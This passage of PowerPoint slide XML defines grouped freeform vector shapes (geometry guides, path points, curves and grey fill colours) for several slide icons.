              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9689" y="232"/>
                <a:ext cx="2645" cy="2069"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 536 w 672"/>
                  <a:gd name="T1" fmla="*/ 525 h 525"/>
                  <a:gd name="T2" fmla="*/ 534 w 672"/>
                  <a:gd name="T3" fmla="*/ 518 h 525"/>
                  <a:gd name="T4" fmla="*/ 672 w 672"/>
                  <a:gd name="T5" fmla="*/ 53 h 525"/>
                  <a:gd name="T6" fmla="*/ 478 w 672"/>
                  <a:gd name="T7" fmla="*/ 0 h 525"/>
                  <a:gd name="T8" fmla="*/ 0 w 672"/>
                  <a:gd name="T9" fmla="*/ 421 h 525"/>
                  <a:gd name="T10" fmla="*/ 536 w 672"/>
                  <a:gd name="T11" fmla="*/ 525 h 5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72"/>
                  <a:gd name="T19" fmla="*/ 0 h 525"/>
                  <a:gd name="T20" fmla="*/ 672 w 672"/>
                  <a:gd name="T21" fmla="*/ 525 h 52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72" h="525">
                    <a:moveTo>
                      <a:pt x="536" y="525"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="536" y="525"/>
                      <a:pt x="535" y="519"/>
                      <a:pt x="534" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="488"/>
                      <a:pt x="672" y="53"/>
                      <a:pt x="672" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="478" y="0"/>
                      <a:pt x="478" y="0"/>
                      <a:pt x="478" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="421"/>
                      <a:pt x="0" y="421"/>
                      <a:pt x="0" y="421"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="536" y="52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874" name="Group 2951"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3850361" y="2113625"/>
              <a:ext cx="1016000" cy="969963"/>
              <a:chOff x="688" y="1065"/>
              <a:chExt cx="1939" cy="1850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="875" name="Freeform 2952"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="688" y="1065"/>
                <a:ext cx="1939" cy="1850"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4041"/>
                  <a:gd name="T1" fmla="*/ 1084 h 3855"/>
                  <a:gd name="T2" fmla="*/ 0 w 4041"/>
                  <a:gd name="T3" fmla="*/ 3855 h 3855"/>
                  <a:gd name="T4" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T5" fmla="*/ 2770 h 3855"/>
                  <a:gd name="T6" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T7" fmla="*/ 0 h 3855"/>
                  <a:gd name="T8" fmla="*/ 0 w 4041"/>
                  <a:gd name="T9" fmla="*/ 1084 h 38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41" h="3855">
                    <a:moveTo>
                      <a:pt x="0" y="1084"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="3855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="2770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4041" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1084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969696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876" name="Group 2953"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1547" y="1722"/>
                <a:ext cx="434" cy="962"/>
                <a:chOff x="1547" y="1722"/>
                <a:chExt cx="434" cy="962"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="877" name="Freeform 2954"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1574" y="1758"/>
                  <a:ext cx="381" cy="920"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 794"/>
                    <a:gd name="T1" fmla="*/ 213 h 1916"/>
                    <a:gd name="T2" fmla="*/ 0 w 794"/>
                    <a:gd name="T3" fmla="*/ 1916 h 1916"/>
                    <a:gd name="T4" fmla="*/ 794 w 794"/>
                    <a:gd name="T5" fmla="*/ 1703 h 1916"/>
                    <a:gd name="T6" fmla="*/ 794 w 794"/>
                    <a:gd name="T7" fmla="*/ 0 h 1916"/>
                    <a:gd name="T8" fmla="*/ 0 w 794"/>
                    <a:gd name="T9" fmla="*/ 213 h 19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94" h="1916">
                      <a:moveTo>
                        <a:pt x="0" y="213"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1916"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="1703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="213"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B6B6B6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78" name="Freeform 2955"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1612" y="2228"/>
                  <a:ext cx="27" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 14 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 26 w 57"/>
                    <a:gd name="T7" fmla="*/ 66 h 73"/>
                    <a:gd name="T8" fmla="*/ 26 w 57"/>
                    <a:gd name="T9" fmla="*/ 26 h 73"/>
                    <a:gd name="T10" fmla="*/ 57 w 57"/>
                    <a:gd name="T11" fmla="*/ 19 h 73"/>
                    <a:gd name="T12" fmla="*/ 57 w 57"/>
                    <a:gd name="T13" fmla="*/ 0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73">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="19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79" name="Freeform 2956"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1547" y="1841"/>
                  <a:ext cx="27" cy="843"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 1755"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 817 h 1755"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 817 h 1755"/>
                    <a:gd name="T6" fmla="*/ 0 w 57"/>
                    <a:gd name="T7" fmla="*/ 817 h 1755"/>
                    <a:gd name="T8" fmla="*/ 0 w 57"/>
                    <a:gd name="T9" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T12" fmla="*/ 0 w 57"/>
                    <a:gd name="T13" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T14" fmla="*/ 0 w 57"/>
                    <a:gd name="T15" fmla="*/ 1755 h 1755"/>
                    <a:gd name="T16" fmla="*/ 57 w 57"/>
                    <a:gd name="T17" fmla="*/ 1738 h 1755"/>
                    <a:gd name="T18" fmla="*/ 57 w 57"/>
                    <a:gd name="T19" fmla="*/ 47 h 1755"/>
                    <a:gd name="T20" fmla="*/ 0 w 57"/>
                    <a:gd name="T21" fmla="*/ 0 h 1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7" h="1755">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1755"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="1738"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="4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80" name="Freeform 2957"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1547" y="1723"/>
                  <a:ext cx="434" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 851 w 905"/>
                    <a:gd name="T1" fmla="*/ 14 h 288"/>
                    <a:gd name="T2" fmla="*/ 0 w 905"/>
                    <a:gd name="T3" fmla="*/ 241 h 288"/>
                    <a:gd name="T4" fmla="*/ 57 w 905"/>
                    <a:gd name="T5" fmla="*/ 288 h 288"/>
                    <a:gd name="T6" fmla="*/ 851 w 905"/>
                    <a:gd name="T7" fmla="*/ 76 h 288"/>
                    <a:gd name="T8" fmla="*/ 905 w 905"/>
                    <a:gd name="T9" fmla="*/ 0 h 288"/>
                    <a:gd name="T10" fmla="*/ 851 w 905"/>
                    <a:gd name="T11" fmla="*/ 14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05" h="288">
                      <a:moveTo>
                        <a:pt x="851" y="14"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="905" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="14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81" name="Freeform 2958"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1955" y="1722"/>
                  <a:ext cx="26" cy="852"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 54"/>
                    <a:gd name="T1" fmla="*/ 75 h 1774"/>
                    <a:gd name="T2" fmla="*/ 0 w 54"/>
                    <a:gd name="T3" fmla="*/ 838 h 1774"/>
                    <a:gd name="T4" fmla="*/ 0 w 54"/>
                    <a:gd name="T5" fmla="*/ 838 h 1774"/>
                    <a:gd name="T6" fmla="*/ 0 w 54"/>
                    <a:gd name="T7" fmla="*/ 838 h 1774"/>
                    <a:gd name="T8" fmla="*/ 0 w 54"/>
                    <a:gd name="T9" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T10" fmla="*/ 0 w 54"/>
                    <a:gd name="T11" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T12" fmla="*/ 0 w 54"/>
                    <a:gd name="T13" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T14" fmla="*/ 0 w 54"/>
                    <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                    <a:gd name="T16" fmla="*/ 54 w 54"/>
                    <a:gd name="T17" fmla="*/ 1760 h 1774"/>
                    <a:gd name="T18" fmla="*/ 54 w 54"/>
                    <a:gd name="T19" fmla="*/ 0 h 1774"/>
                    <a:gd name="T20" fmla="*/ 0 w 54"/>
                    <a:gd name="T21" fmla="*/ 75 h 17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4" h="1774">
                      <a:moveTo>
                        <a:pt x="0" y="75"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="1760"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="0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82" name="Group 1461"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5016120" y="2901571"/>
              <a:ext cx="657225" cy="196850"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="883" name="Freeform 1462"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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4" name="Freeform 1464"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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5" name="Freeform 1465"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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6" name="Freeform 1466"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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887" name="Group 1369"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3901695" y="2344358"/>
              <a:ext cx="504825" cy="504825"/>
              <a:chOff x="562" y="1822"/>
              <a:chExt cx="318" cy="318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="888" name="Rectangle 1370"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="840" y="2100"/>
                <a:ext cx="40" cy="4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9" name="Rectangle 1371"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="759" y="2019"/>
                <a:ext cx="71" cy="71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890" name="Group 1372"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="562" y="1822"/>
                <a:ext cx="187" cy="187"/>
                <a:chOff x="-12610" y="18860"/>
                <a:chExt cx="330" cy="331"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="891" name="Rectangle 1373"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-12610" y="18860"/>
                  <a:ext cx="330" cy="331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1B171B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92" name="Freeform 1374"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-12535" y="18898"/>
                  <a:ext cx="182" cy="255"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 77"/>
                    <a:gd name="T1" fmla="*/ 47 h 108"/>
                    <a:gd name="T2" fmla="*/ 62 w 77"/>
                    <a:gd name="T3" fmla="*/ 23 h 108"/>
                    <a:gd name="T4" fmla="*/ 38 w 77"/>
                    <a:gd name="T5" fmla="*/ 0 h 108"/>
                    <a:gd name="T6" fmla="*/ 14 w 77"/>
                    <a:gd name="T7" fmla="*/ 23 h 108"/>
                    <a:gd name="T8" fmla="*/ 38 w 77"/>
                    <a:gd name="T9" fmla="*/ 47 h 108"/>
                    <a:gd name="T10" fmla="*/ 77 w 77"/>
                    <a:gd name="T11" fmla="*/ 61 h 108"/>
                    <a:gd name="T12" fmla="*/ 71 w 77"/>
                    <a:gd name="T13" fmla="*/ 54 h 108"/>
                    <a:gd name="T14" fmla="*/ 5 w 77"/>
                    <a:gd name="T15" fmla="*/ 54 h 108"/>
                    <a:gd name="T16" fmla="*/ 0 w 77"/>
                    <a:gd name="T17" fmla="*/ 61 h 108"/>
                    <a:gd name="T18" fmla="*/ 0 w 77"/>
                    <a:gd name="T19" fmla="*/ 101 h 108"/>
                    <a:gd name="T20" fmla="*/ 5 w 77"/>
                    <a:gd name="T21" fmla="*/ 108 h 108"/>
                    <a:gd name="T22" fmla="*/ 71 w 77"/>
                    <a:gd name="T23" fmla="*/ 108 h 108"/>
                    <a:gd name="T24" fmla="*/ 77 w 77"/>
                    <a:gd name="T25" fmla="*/ 101 h 108"/>
                    <a:gd name="T26" fmla="*/ 77 w 77"/>
                    <a:gd name="T27" fmla="*/ 6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7" h="108">
                      <a:moveTo>
                        <a:pt x="38" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="47"/>
                        <a:pt x="62" y="36"/>
                        <a:pt x="62" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="10"/>
                        <a:pt x="51" y="0"/>
                        <a:pt x="38" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="0"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
                        <a:pt x="25" y="47"/>
                        <a:pt x="38" y="47"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="77" y="61"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="57"/>
                        <a:pt x="74" y="54"/>
                        <a:pt x="71" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                        <a:pt x="5" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="54"/>
                        <a:pt x="0" y="57"/>
                        <a:pt x="0" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="107"/>
                        <a:pt x="0" y="101"/>
                        <a:pt x="0" y="101"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="105"/>
                        <a:pt x="2" y="108"/>
                        <a:pt x="5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4" y="108"/>
                        <a:pt x="77" y="105"/>
                        <a:pt x="77" y="101"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="77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93" name="Group 15"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4854609" y="2299980"/>
              <a:ext cx="679138" cy="653195"/>
              <a:chOff x="2634" y="1684"/>
              <a:chExt cx="1298" cy="1247"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="894" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2634" y="1684"/>
                <a:ext cx="1298" cy="1247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 258 w 1535"/>
                  <a:gd name="T1" fmla="*/ 0 h 1472"/>
                  <a:gd name="T2" fmla="*/ 0 w 1535"/>
                  <a:gd name="T3" fmla="*/ 69 h 1472"/>
                  <a:gd name="T4" fmla="*/ 0 w 1535"/>
                  <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                  <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                  <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T9" fmla="*/ 411 h 1472"/>
                  <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T11" fmla="*/ 343 h 1472"/>
                  <a:gd name="T12" fmla="*/ 258 w 1535"/>
                  <a:gd name="T13" fmla="*/ 0 h 1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35" h="1472">
                    <a:moveTo>
                      <a:pt x="258" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="1472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="343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6D6D6C"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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5" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2634" y="2553"/>
                <a:ext cx="1298" cy="348"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T1" fmla="*/ 342 h 410"/>
                  <a:gd name="T2" fmla="*/ 255 w 1535"/>
                  <a:gd name="T3" fmla="*/ 0 h 410"/>
                  <a:gd name="T4" fmla="*/ 0 w 1535"/>
                  <a:gd name="T5" fmla="*/ 68 h 410"/>
                  <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T7" fmla="*/ 410 h 410"/>
                  <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T9" fmla="*/ 342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35" h="410">
                    <a:moveTo>
                      <a:pt x="1535" y="342"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="342"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="303030"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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6" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2634" y="2331"/>
                <a:ext cx="1298" cy="348"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T1" fmla="*/ 342 h 411"/>
                  <a:gd name="T2" fmla="*/ 255 w 1535"/>
                  <a:gd name="T3" fmla="*/ 0 h 411"/>
                  <a:gd name="T4" fmla="*/ 0 w 1535"/>
                  <a:gd name="T5" fmla="*/ 69 h 411"/>
                  <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T7" fmla="*/ 411 h 411"/>
                  <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T9" fmla="*/ 342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35" h="411">
                    <a:moveTo>
                      <a:pt x="1535" y="342"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="342"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="303030"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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7" name="Freeform 19"/>
              <p:cNvSpPr>
